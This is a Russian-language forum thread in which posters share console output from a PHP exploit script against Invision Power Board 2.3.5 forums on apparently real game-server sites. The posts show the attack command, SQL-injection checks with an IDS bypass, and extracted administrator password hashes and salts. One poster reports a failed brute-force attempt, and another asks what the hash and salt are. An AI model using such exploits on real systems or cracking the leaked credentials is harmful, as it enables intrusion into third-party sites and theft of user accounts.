Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
Цитата:
C:\Documents and Settings\Администратор\1\Php>php.exe 2.3.5-ipb-multi.php -attac
k 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 1
Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::
Attack(s):
+ [06.04.2010 13:28:20]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
+ pass_hash=4115d1f83c891cdd27afe04bd4ca8eb6
+ Ok, using hash 4115d1f83c891cdd27afe04bd4ca8eb6
/ Trying to get the password salt
+ pass_salt=MhXDN
+ Ok, using salt MhXDN
+ Enjoy!
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
Код:
+ http://l2leona.ru/forum/
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 2
/ Trying to get the password hash
+ pass_hash=f90845fb9872edcf0ece92f0fb862cfb
+ Ok, using hash f90845fb9872edcf0ece92f0fb862cfb
/ Trying to get the password salt
+ pass_salt=2e:|j
+ Ok, using salt 2e:|j
+ Enjoy!
+ [06.04.2010 23:18:29]
+ Total: 188
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
Цитата:
Сообщение от Bomjke
Без соли ?
hash 4115d1f83c891cdd27afe04bd4ca8eb6
salt MhXDN
я брутил полным перебором, 8 символов, большие + малые буквы + цыфры, безрезультатно
________________
C Жука не выгоните ^^) Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Написал в асю - представься и уточни что с Жука, иначе игнор
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
Народ сори за тупой вопрос
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
/
+ Ok, using hash 140db6898b1ce6afc16e5a581d6a1379 <<<<Это хеш??
/ Trying to get the password salt
/
+ Ok, using salt TxqKE <<<<А это чо такое понять немогу
+ Enjoy!